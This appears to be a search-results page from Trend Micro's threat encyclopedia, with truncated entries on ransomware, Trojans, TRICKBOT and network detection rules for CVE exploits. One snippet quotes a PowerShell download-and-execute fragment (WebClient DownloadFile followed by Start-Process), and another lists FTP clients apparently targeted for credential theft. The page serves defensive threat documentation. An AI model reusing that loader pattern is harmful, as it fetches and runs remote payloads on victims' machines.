Search

This ransomware was uncovered by Trend Micro during late May 2017. The first variant of the UIWIX malware family, it sports fileless infection capabilities as well as the ability to take advantage of

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive

TRICKBOT - Malicious certificate - SSL Detection Name: HTTPS_TRICKBOT_CERTIFICATE Malware Family: TRICKBOT Related Malware: N/A NOTES: Attack Phase: Command and Control Communication Protocol: HTTPS

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It

(new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } } It does not exploit any vulnerability. NOTES: The MS Excel file

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. It encrypts files

GlobalSCAPE CuteFTP Lite GlobalSCAPE CuteFTP Pro GoFTP INSoftware NovaFTP Ipswitch WS_FTP LeapWare LeapFTP LeechFTP LinasFTP MAS-Soft FTPInfo MS IE FTP Martin Prikryl My FTP NCH Software ClassicFTP NCH Software

Description Name: CVE-2019-1652 CISCO UNAUTHENTICATED RCE - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavio...

Description Name: CVE-2014-9118 ZHONE RCE EXPLOIT - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely comprom...

Win32/Exploit.CVE-2014-4114.A (ESET), Trojan.PPDropper (Symantec) An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm” October 2014 Patch Tuesday Fixes Sandworm Vulnerability MS Zero-Day Used in Attacks

Description Name: CVE-2018-8476 Windows Deployment Services Remote Code Execution Exploit - TFTP (Request) . This is Trend Micro detection for TFTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movem...

Description Name: CVE-2019-6703 WordPress Total Donations Unauthentication Exploit - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of n...

Description Name: CVE-2016-1555 - Netgear Devices - Unauthenticated Remote Code Execution - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this ty...

Description Name: CVE-2016-3088 ACTIVEMQ - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely compromised by m...

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It does not have any backdoor routine. It does not have

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It takes advantage of certain vulnerabilities. Arrival

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a

“Sandworm” October 2014 Patch Tuesday Fixes Sandworm Vulnerability MS Zero-Day Used in Attacks Against European Sectors, Industries Sandworm to Blacken: The SCADA Connection Downloaded from the Internet

Description Name: CVE-2017-10271 - Oracle Weblogic Exploit - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavi...